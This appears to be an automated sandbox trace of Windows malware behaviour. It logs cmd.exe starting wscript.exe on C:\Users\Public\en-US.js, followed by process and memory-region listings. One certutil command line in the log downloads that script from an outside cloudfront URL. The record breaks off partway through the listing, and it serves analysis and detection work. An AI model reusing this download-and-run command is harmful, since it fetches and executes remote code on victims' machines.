[0045.224] _wcsicmp (_String1="wscript.exe", _String2="RD") returned 5
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="RMDIR") returned 5
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="PATH") returned 7
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="GOTO") returned 16
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="SHIFT") returned 4
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="CLS") returned 20
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="CALL") returned 20
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="VERIFY") returned 1
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="VER") returned 1
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="VOL") returned 1
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="EXIT") returned 18
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="SETLOCAL") returned 4
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="ENDLOCAL") returned 18
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="TITLE") returned 3
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="START") returned 4
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="DPATH") returned 19
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="KEYS") returned 12
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="MOVE") returned 10
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="PUSHD") returned 7
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="POPD") returned 7
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="ASSOC") returned 22
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="FTYPE") returned 17
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="BREAK") returned 21
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="COLOR") returned 20
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="MKLINK") returned 10
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="FOR") returned 17
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="IF") returned 14
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="REM") returned 5
[0045.224] _wcsnicmp (_String1="wscr", _String2="cmd ", _MaxCount=0x4) returned 20
[0045.224] SetErrorMode (uMode=0x0) returned 0x1
[0045.224] SetErrorMode (uMode=0x1) returned 0x0
[0045.224] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e970f83a0, lpFilePart=0x4e96eeebf0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x4e96eeebf0*="system32") returned 0x13
[0045.224] SetErrorMode (uMode=0x1) returned 0x1
[0045.225] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
[0045.225] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0045.225] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0045.225] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0045.225] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wscript.exe", fInfoLevelId=0x1, lpFindFileData=0x4e96eee970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4e96eee970) returned 0x4e970f8740
[0045.225] FindClose (in: hFindFile=0x4e970f8740 | out: hFindFile=0x4e970f8740) returned 1
[0045.225] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
[0045.225] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
[0045.225] GetConsoleTitleW (in: lpConsoleTitle=0x4e96eeeed0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0045.225] InitializeProcThreadAttributeList (in: lpAttributeList=0x4e96eeedf0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4e96eeecf0 | out: lpAttributeList=0x4e96eeedf0, lpSize=0x4e96eeecf0) returned 1
[0045.225] UpdateProcThreadAttribute (in: lpAttributeList=0x4e96eeedf0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4e96eeecdc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4e96eeedf0, lpPreviousValue=0x0) returned 1
[0045.225] GetStartupInfoW (in: lpStartupInfo=0x4e96eeed80 | out: lpStartupInfo=0x4e96eeed80*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0xc, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0045.225] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0045.225] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38
[0045.225] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0045.225] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0045.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0045.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0045.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0045.226] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0045.226] lstrcmpW (lpString1="\\wscript.exe", lpString2="\\XCOPY.EXE") returned -1
[0045.226] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wscript.exe", lpCommandLine="wscript.exe C:\\Users\\Public\\en-US.js", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x4e96eeed10*(cb=0x70, lpReserved=0x0, lpDesktop="", lpTitle="wscript.exe C:\\Users\\Public\\en-US.js", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4e96eeecf8 | out: lpCommandLine="wscript.exe C:\\Users\\Public\\en-US.js", lpProcessInformation=0x4e96eeecf8*(hProcess=0x88, hThread=0x8c, dwProcessId=0x33c, dwThreadId=0x250)) returned 1
[0045.351] CloseHandle (hObject=0x8c) returned 1
[0045.351] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0045.351] GetEnvironmentStringsW () returned 0x4e970fae70*
[0045.352] FreeEnvironmentStringsA (penv="=") returned 1
[0045.352] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0xffffffff) returned 0x0
[0050.703] GetExitCodeProcess (in: hProcess=0x88, lpExitCode=0x4e96eeec78 | out: lpExitCode=0x4e96eeec78*=0x0) returned 1
[0050.704] CloseHandle (hObject=0x88) returned 1
[0050.704] _vsnwprintf (in: _Buffer=0x4e96eeee38, _BufferCount=0x13, _Format="%08X", _ArgList=0x4e96eeec88 | out: _Buffer="00000000") returned 8
[0050.704] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0050.704] GetEnvironmentStringsW () returned 0x4e970fae70*
[0050.704] FreeEnvironmentStringsA (penv="=") returned 1
[0050.704] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0050.704] GetEnvironmentStringsW () returned 0x4e970fae70*
[0050.704] FreeEnvironmentStringsA (penv="=") returned 1
[0050.704] DeleteProcThreadAttributeList (in: lpAttributeList=0x4e96eeedf0 | out: lpAttributeList=0x4e96eeedf0)
[0050.704] _get_osfhandle (_FileHandle=1) returned 0x24
[0050.704] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1
[0050.706] _get_osfhandle (_FileHandle=1) returned 0x24
[0050.706] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7907185ec | out: lpMode=0x7ff7907185ec) returned 1
[0050.716] _get_osfhandle (_FileHandle=0) returned 0x20
[0050.716] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7907185e8 | out: lpMode=0x7ff7907185e8) returned 1
[0050.719] SetConsoleInputExeNameW () returned 0x1
[0050.719] GetConsoleOutputCP () returned 0x1b5
[0050.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff790718640 | out: lpCPInfo=0x7ff790718640) returned 1
[0050.726] SetThreadUILanguage (LangId=0x0) returned 0x409
[0052.454] exit (_Code=0)
Thread:
id = 96
os_tid = 0xbec
Process:
id = "5"
image_name = "conhost.exe"
filename = "c:\\windows\\system32\\conhost.exe"
page_root = "0x2282e000"
os_pid = "0xab4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0xc40"
cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
cur_dir = "C:\\Windows"
os_username = "LHNIWSJ\\CIiHmnxMn6Ps"
os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 927
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 928
start_va = 0xf4addd0000
end_va = 0xf4addeffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4addd0000"
filename = ""
Region:
id = 929
start_va = 0xf4addf0000
end_va = 0xf4ade03fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4addf0000"
filename = ""
Region:
id = 930
start_va = 0xf4ade10000
end_va = 0xf4ade4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4ade10000"
filename = ""
Region:
id = 931
start_va = 0x7df5ffd70000
end_va = 0x7ff5ffd6ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffd70000"
filename = ""
Region:
id = 932
start_va = 0x7ff79d250000
end_va = 0x7ff79d272fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff79d250000"
filename = ""
Region:
id = 933
start_va = 0x7ff79d27d000
end_va = 0x7ff79d27dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff79d27d000"
filename = ""
Region:
id = 934
start_va = 0x7ff79d27e000
end_va = 0x7ff79d27ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff79d27e000"
filename = ""
Region:
id = 935
start_va = 0x7ff79e220000
end_va = 0x7ff79e230fff
entry_point = 0x7ff79e220000
region_type = mapped_file
name = "conhost.exe"
filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")
Region:
id = 936
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 938
start_va = 0xf4addd0000
end_va = 0xf4adddffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4addd0000"
filename = ""
Region:
id = 939
start_va = 0xf4ade50000
end_va = 0xf4adf0dfff
entry_point = 0xf4ade50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 940
start_va = 0xf4adfa0000
end_va = 0xf4ae09ffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4adfa0000"
filename = ""
Region:
id = 941
start_va = 0x7ff79d150000
end_va = 0x7ff79d24ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff79d150000"
filename = ""
Region:
id = 942
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 943
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 944
start_va = 0xf4adf10000
end_va = 0xf4adf4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4adf10000"
filename = ""
Region:
id = 945
start_va = 0xf4ae1e0000
end_va = 0xf4ae1effff
entry_point = 0x0
region_type = private
name = "private_0x000000f4ae1e0000"
filename = ""
Region:
id = 946
start_va = 0x7ff79d27b000
end_va = 0x7ff79d27cfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff79d27b000"
filename = ""
Region:
id = 947
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 948
start_va = 0xf4adde0000
end_va = 0xf4adde6fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4adde0000"
filename = ""
Region:
id = 949
start_va = 0xf4adf50000
end_va = 0xf4adf50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4adf50000"
filename = ""
Region:
id = 950
start_va = 0xf4adf60000
end_va = 0xf4adf66fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4adf60000"
filename = ""
Region:
id = 951
start_va = 0x7ffb21ea0000
end_va = 0x7ffb21ef2fff
entry_point = 0x7ffb21ea0000
region_type = mapped_file
name = "conhostv2.dll"
filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")
Region:
id = 952
start_va = 0x7ffb36950000
end_va = 0x7ffb36ad2fff
entry_point = 0x7ffb36950000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 953
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 954
start_va = 0x7ffb3c290000
end_va = 0x7ffb3c2c5fff
entry_point = 0x7ffb3c290000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 955
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 956
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 957
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 958
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 959
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 960
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 961
start_va = 0x7ffb3d020000
end_va = 0x7ffb3d17bfff
entry_point = 0x7ffb3d020000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 962
start_va = 0xf4adf70000
end_va = 0xf4adf70fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4adf70000"
filename = ""
Region:
id = 963
start_va = 0xf4adf80000
end_va = 0xf4adf80fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4adf80000"
filename = ""
Region:
id = 964
start_va = 0xf4ae0a0000
end_va = 0xf4ae0dffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4ae0a0000"
filename = ""
Region:
id = 965
start_va = 0xf4ae1f0000
end_va = 0xf4ae377fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4ae1f0000"
filename = ""
Region:
id = 966
start_va = 0xf4ae380000
end_va = 0xf4ae500fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4ae380000"
filename = ""
Region:
id = 967
start_va = 0xf4ae510000
end_va = 0xf4af90ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4ae510000"
filename = ""
Region:
id = 968
start_va = 0xf4afa70000
end_va = 0xf4afa7ffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4afa70000"
filename = ""
Region:
id = 969
start_va = 0x7ff79d279000
end_va = 0x7ff79d27afff
entry_point = 0x0
region_type = private
name = "private_0x00007ff79d279000"
filename = ""
Region:
id = 970
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 971
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 972
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 973
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 974
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 975
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 976
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 977
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 978
start_va = 0x7ffb38610000
end_va = 0x7ffb386a5fff
entry_point = 0x7ffb38610000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 979
start_va = 0xf4adf90000
end_va = 0xf4adf93fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4adf90000"
filename = ""
Region:
id = 980
start_va = 0xf4ae0e0000
end_va = 0xf4ae197fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4ae0e0000"
filename = ""
Region:
id = 981
start_va = 0xf4af910000
end_va = 0xf4afa1ffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4af910000"
filename = ""
Region:
id = 982
start_va = 0xf4afa80000
end_va = 0xf4afb93fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4afa80000"
filename = ""
Region:
id = 983
start_va = 0xf4afbe0000
end_va = 0xf4afbeffff
entry_point = 0x0
region_type = private
name = "private_0x000000f4afbe0000"
filename = ""
Region:
id = 984
start_va = 0xf4afbf0000
end_va = 0xf4aff26fff
entry_point = 0xf4afbf0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 985
start_va = 0xf4aff30000
end_va = 0xf4b0141fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4aff30000"
filename = ""
Region:
id = 986
start_va = 0xf4b0150000
end_va = 0xf4b036dfff
entry_point = 0x0
region_type = private
name = "private_0x000000f4b0150000"
filename = ""
Region:
id = 987
start_va = 0xf4b0370000
end_va = 0xf4b0583fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4b0370000"
filename = ""
Region:
id = 988
start_va = 0x7ffb37f40000
end_va = 0x7ffb37f61fff
entry_point = 0x7ffb37f40000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 989
start_va = 0x7ffb37a60000
end_va = 0x7ffb37a72fff
entry_point = 0x7ffb37a60000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 990
start_va = 0x7ffb391c0000
end_va = 0x7ffb39217fff
entry_point = 0x7ffb391c0000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 991
start_va = 0xf4ae1a0000
end_va = 0xf4ae1a6fff
entry_point = 0x0
region_type = private
name = "private_0x000000f4ae1a0000"
filename = ""
Region:
id = 992
start_va = 0xf4ae1b0000
end_va = 0xf4ae1b4fff
entry_point = 0xf4ae1b0000
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 993
start_va = 0xf4ae1c0000
end_va = 0xf4ae1c0fff
entry_point = 0xf4ae1c0000
region_type = mapped_file
name = "conhostv2.dll.mui"
filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")
Region:
id = 994
start_va = 0xf4ae1d0000
end_va = 0xf4ae1d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000f4ae1d0000"
filename = ""
Region:
id = 995
start_va = 0x7ffb34cc0000
end_va = 0x7ffb34f33fff
entry_point = 0x7ffb34cc0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll")
Thread:
id = 92
os_tid = 0xd10
Thread:
id = 93
os_tid = 0xd50
Thread:
id = 94
os_tid = 0xd0c
Thread:
id = 95
os_tid = 0xd08
Process:
id = "6"
image_name = "certutil.exe"
filename = "c:\\windows\\system32\\certutil.exe"
page_root = "0x232f7000"
os_pid = "0xcf4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0xc40"
cmd_line = "certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js "
cur_dir = "C:\\Windows\\system32\\"
os_username = "LHNIWSJ\\CIiHmnxMn6Ps"
os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1007
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1008
start_va = 0x4d31600000
end_va = 0x4d3161ffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31600000"
filename = ""
Region:
id = 1009
start_va = 0x4d31620000
end_va = 0x4d31633fff
entry_point = 0x0
region_type = pagefile_backed
